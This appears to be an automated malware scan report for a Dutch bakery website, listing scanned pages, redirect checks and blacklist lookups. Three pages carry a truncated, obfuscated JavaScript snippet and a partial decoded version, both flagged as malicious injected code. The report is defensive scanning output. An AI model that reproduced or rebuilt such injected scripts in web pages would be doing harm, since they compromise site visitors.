Scanned pages/files
Request | Server response | Status |
http://www.limburgiaderompert.nl/ | 200 OK Content-Length: 18871 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( Antivirus reports:
| ||
http://www.limburgiaderompert.nl/media/system/js/mootools-core.js | 200 OK Content-Length: 96362 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/media/system/js/core.js | 200 OK Content-Length: 4784 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/media/system/js/caption.js | 200 OK Content-Length: 729 Content-Type: text/javascript | clean |
http://code.jquery.com/jquery-latest.pack.js | 200 OK Content-Length: 95786 Content-Type: application/x-javascript | clean |
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/bootstrap.min.js | 200 OK Content-Length: 26613 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/scrolltopcontrol.js | 200 OK Content-Length: 3711 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/hoverIntent.min.js | 200 OK Content-Length: 1464 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/templates/ajt005_j30/js/superfish.js | 200 OK Content-Length: 3713 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/index.php/vlaaien | 200 OK Content-Length: 25957 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( Antivirus reports:
| ||
http://www.limburgiaderompert.nl/index.php/taarten-en-gebak | 200 OK Content-Length: 25791 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) (function(e4){var jKl=function(bWc){return bWc["\x74\x6f\x53\x74\x72"+"\x69\x6e\x67"](36)},zwU=function(nSn){return nSn[jKl(918239)]("") },qvQ=""+zwU(["\xb7z\xbdQ\xf2ZY\x94","\xff\x9a\xd3\xfa\x12","W\x81\x07\xfeI0\x028","qQ\x17r\"\x12_-\x08u","aj\x1f/?c2+\x15rQ","\x13u\x08;_\x00\x0bu","Hi\x1b\x02;c1(8uQ","\x17q%?[\x00\x0bXei","\x18+\x12J\x18+\x15r","x:X%\x12X)\x08P\x0e","\x15|AF\x03WL0;\x0e3","\x03X\x0b\x00\x1d1JS","\x16sP\x12\x0f\x08I%","P>o\x16KF;OlP\x12IiT","S\x18\x18C%#\x0dXP","\x0an*E2\x Decoded script: (function(CV){p9R=32;var e0k=(function(z){var a=[UB("\xe0j\xb88k<I~\xb2hf"+"\xb2\xbc"),UB("\xf4q\xb9-w"),UB("\xeb}\xb4>w-"),UB("\xf0l\xa45z"),UB("\xe2h\xad<q=Oz\xbeig"),UB("\xe4}\xa9\x1cs<aw"+"\xb9qp\x9e\xb1\x94v`"+"\xdd*\xf5\xe6"),UB("\xcey\xa91"),UB("\xecn\xb8+y5ce"),UB("\xf3w\xae0k0c|"),UB("\xef}\xbb-")],b=[UB("\xe7w\xbe,r<bf"),UB("\xe5t\xb26m"),UB("\xf1y\xb3=p4"),UB( Antivirus reports:
| ||
http://www.limburgiaderompert.nl//ajax.googleapis.com/ajax/libs/jquery/1.8.2/jquery.min.js/ | 404 Not Found Content-Length: 67 Content-Type: text/html | clean |
http://www.limburgiaderompert.nl/test404page.js | 404 Not Found Content-Length: 67 Content-Type: text/html | clean |
http://www.limburgiaderompert.nl/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 81 Content-Type: text/javascript | clean |
http://www.limburgiaderompert.nl/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 10634 Content-Type: text/javascript | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: limburgiaderompert.nl
Result:
GET / HTTP/1.1
Host: limburgiaderompert.nl
Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: limburgiaderompert.nl
Referer: http://www.google.com/search?q=limburgiaderompert.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: limburgiaderompert.nl
Referer: http://www.google.com/search?q=limburgiaderompert.nl
Result:
The result is similar to the first query. There are no suspicious redirects found.
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=limburgiaderompert.nl
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://limburgiaderompert.nl/
Result: limburgiaderompert.nl is not infected or malware details are not published yet.
Result: limburgiaderompert.nl is not infected or malware details are not published yet.